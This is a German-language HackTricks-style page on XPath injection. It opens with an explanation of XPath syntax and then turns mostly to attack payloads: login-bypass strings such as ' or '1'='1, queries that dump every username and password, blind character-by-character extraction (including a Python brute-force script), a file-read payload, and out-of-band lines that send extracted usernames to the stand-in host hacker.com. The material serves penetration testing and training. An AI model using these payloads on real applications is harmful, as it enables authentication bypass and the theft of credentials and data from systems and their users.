# XPATH-Injection {{#include ../banners/hacktricks-training.md}} ## Grundsyntax Eine Angriffstechnik, die als XPath-Injection bekannt ist, wird verwendet, um Anwendungen auszunutzen, die XPath (XML Path Language) Abfragen basierend auf Benutzereingaben bilden, um XML-Dokumente abzufragen oder zu navigieren. ### Beschriebene Knoten Ausdrücke werden verwendet, um verschiedene Knoten in einem XML-Dokument auszuwählen. Diese Ausdrücke und ihre Beschreibungen sind unten zusammengefasst: - **nodename**: Alle Knoten mit dem Namen "nodename" werden ausgewählt. - **/**: Die Auswahl erfolgt vom Wurzelknoten. - **//**: Knoten, die der Auswahl vom aktuellen Knoten entsprechen, werden ausgewählt, unabhängig von ihrem Standort im Dokument. - **.**: Der aktuelle Knoten wird ausgewählt. - **..**: Der Elternknoten des aktuellen Knotens wird ausgewählt. - **@**: Attribute werden ausgewählt. ### XPath-Beispiele Beispiele für Pfadausdrücke und deren Ergebnisse umfassen: - **bookstore**: Alle Knoten mit dem Namen "bookstore" werden ausgewählt. - **/bookstore**: Das Wurzelelement bookstore wird ausgewählt. Es wird angemerkt, dass ein absoluter Pfad zu einem Element durch einen Pfad dargestellt wird, der mit einem Schrägstrich (/) beginnt. - **bookstore/book**: Alle Buch-Elemente, die Kinder von bookstore sind, werden ausgewählt. - **//book**: Alle Buch-Elemente im Dokument werden ausgewählt, unabhängig von ihrem Standort. - **bookstore//book**: Alle Buch-Elemente, die Nachkommen des bookstore-Elements sind, werden ausgewählt, egal wo sie sich unter dem bookstore-Element befinden. - **//@lang**: Alle Attribute mit dem Namen lang werden ausgewählt. ### Nutzung von Prädikaten Prädikate werden verwendet, um Auswahlen zu verfeinern: - **/bookstore/book\[1]**: Das erste Buch-Element-Kind des bookstore-Elements wird ausgewählt. Eine Umgehung für IE-Versionen 5 bis 9, die den ersten Knoten als \[0] indizieren, besteht darin, die SelectionLanguage über JavaScript auf XPath zu setzen. - **/bookstore/book\[last()]**: Das letzte Buch-Element-Kind des bookstore-Elements wird ausgewählt. - **/bookstore/book\[last()-1]**: Das vorletzte Buch-Element-Kind des bookstore-Elements wird ausgewählt. - **/bookstore/book\[position()<3]**: Die ersten beiden Buch-Elemente-Kinder des bookstore-Elements werden ausgewählt. - **//title\[@lang]**: Alle Titel-Elemente mit einem lang-Attribut werden ausgewählt. - **//title\[@lang='en']**: Alle Titel-Elemente mit einem "lang"-Attributwert von "en" werden ausgewählt. - **/bookstore/book\[price>35.00]**: Alle Buch-Elemente des bookstore mit einem Preis von mehr als 35.00 werden ausgewählt. - **/bookstore/book\[price>35.00]/title**: Alle Titel-Elemente der Buch-Elemente des bookstore mit einem Preis von mehr als 35.00 werden ausgewählt. ### Umgang mit unbekannten Knoten Platzhalter werden verwendet, um unbekannte Knoten zuzuordnen: - **\***: Entspricht jedem Elementknoten. - **@**\*: Entspricht jedem Attributknoten. - **node()**: Entspricht jedem Knoten jeglicher Art. Weitere Beispiele umfassen: - **/bookstore/\***: Wählt alle Kind-Elementknoten des bookstore-Elements aus. - **//\***: Wählt alle Elemente im Dokument aus. - **//title\[@\*]**: Wählt alle Titel-Elemente mit mindestens einem Attribut jeglicher Art aus. ## Beispiel ```xml pepe peponcio admin mark m12345 regular fino fino2 regular ``` ### Greifen Sie auf die Informationen zu ``` All names - [pepe, mark, fino] name //name //name/node() //name/child::node() user/name user//name /user/name //user/name All values - [pepe, peponcio, admin, mark, ...] //user/node() //user/child::node() Positions //user[position()=1]/name #pepe //user[last()-1]/name #mark //user[position()=1]/child::node()[position()=2] #peponcio (password) Functions count(//user/node()) #3*3 = 9 (count all values) string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4 substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a" ``` ### Identifizieren & Stehlen des Schemas ```python and count(/*) = 1 #root and count(/*[1]/*) = 2 #count(root) = 2 (a,c) and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b) and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0 and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f) and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0 and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0 and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g) and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0 #The previous solutions are the representation of a schema like the following #(at this stage we don't know the name of the tags, but jus the schema) and name(/*[1]) = "root" #Confirm the name of the first tag is "root" and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `` is "a" and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag ``is codepoint 105 ("i") (https://codepoints.net/) #Stealing the schema via OOB doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1]))) doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1]))) ``` ## Authentifizierungsumgehung ### **Beispiel für Abfragen:** ``` string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text()) $q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]'; ``` ### **OR-Bypass bei Benutzer und Passwort (gleicher Wert in beiden)** ``` ' or '1'='1 " or "1"="1 ' or ''=' " or ""=" string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text()) Select account Select the account using the username and use one of the previous values in the password field ``` ### **Missbrauch von Null-Injection** ``` Username: ' or 1]%00 ``` ### **Doppeltes OR im Benutzernamen oder im Passwort** (ist gültig mit nur 1 verwundbarem Feld) WICHTIG: Beachten Sie, dass die **"und" die erste durchgeführte Operation ist**. ``` Bypass with first match (This requests are also valid without spaces) ' or /* or ' ' or "a" or ' ' or 1 or ' ' or true() or ' string(//user[name/text()='' or true() or '' and password/text()='']/account/text()) Select account 'or string-length(name(.))<10 or' #Select account with length(name)<10 'or contains(name,'adm') or' #Select first account having "adm" in the name 'or contains(.,'adm') or' #Select first account having "adm" in the current value 'or position()=2 or' #Select 2º account string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text()) Select account (name known) admin' or ' admin' or '1'='2 string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text()) ``` ## Zeichenextraktion Die Ausgabe enthält Zeichenfolgen und der Benutzer kann die Werte manipulieren, um zu suchen: ``` /user/username[contains(., '+VALUE+')] ``` ``` ') or 1=1 or (' #Get all names ') or 1=1] | //user/password[('')=(' #Get all names and passwords ') or 2=1] | //user/node()[('')=(' #Get all values ')] | //./node()[('')=(' #Get all values ')] | //node()[('')=(' #Get all values ') or 1=1] | //user/password[('')=(' #Get all names and passwords ')] | //password%00 #All names and passwords (abusing null injection) ')]/../*[3][text()!=(' #All the passwords ')] | //user/*[1] | a[(' #The ID of all users ')] | //user/*[2] | a[(' #The name of all users ')] | //user/*[3] | a[(' #The password of all users ')] | //user/*[4] | a[(' #The account of all users ``` ## Blinde Ausnutzung ### **Länge eines Wertes ermitteln und durch Vergleiche extrahieren:** ```bash ' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4 ' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a" substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) ... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value ``` ### **Python-Beispiel** ```python import requests, string flag = "" l = 0 alphabet = string.ascii_letters + string.digits + "{}_()" for i in range(30): r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i)) if ("TRUE_COND" in r.text): l = i break print("[+] Password length: " + str(l)) for i in range(1, l + 1): #print("[i] Looking for char number " + str(i)) for al in alphabet: r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al) if ("TRUE_COND" in r.text): flag += al print("[+] Flag: " + flag) break ``` ### Datei lesen ```python (substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127 ``` ## OOB-Ausnutzung ```python doc(concat("http://hacker.com/oob/", RESULTS)) doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username)) doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username))) #Instead of doc() you can use the function doc-available doc-available(concat("http://hacker.com/oob/", RESULTS)) #the doc available will respond true or false depending if the doc exists, #user not(doc-available(...)) to invert the result if you need to ``` ### Automatisches Werkzeug - [xcat](https://xcat.readthedocs.io/) - [xxxpwn](https://github.com/feakk/xxxpwn) - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) - [XmlChor](https://github.com/Harshal35/XMLCHOR) ## Referenzen - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection) - [https://wiki.owasp.org/index.php/Testing_for_XPath_Injection\_(OTG-INPVAL-010)]() - [https://www.w3schools.com/xml/xpath_syntax.asp](https://www.w3schools.com/xml/xpath_syntax.asp) {{#include ../banners/hacktricks-training.md}}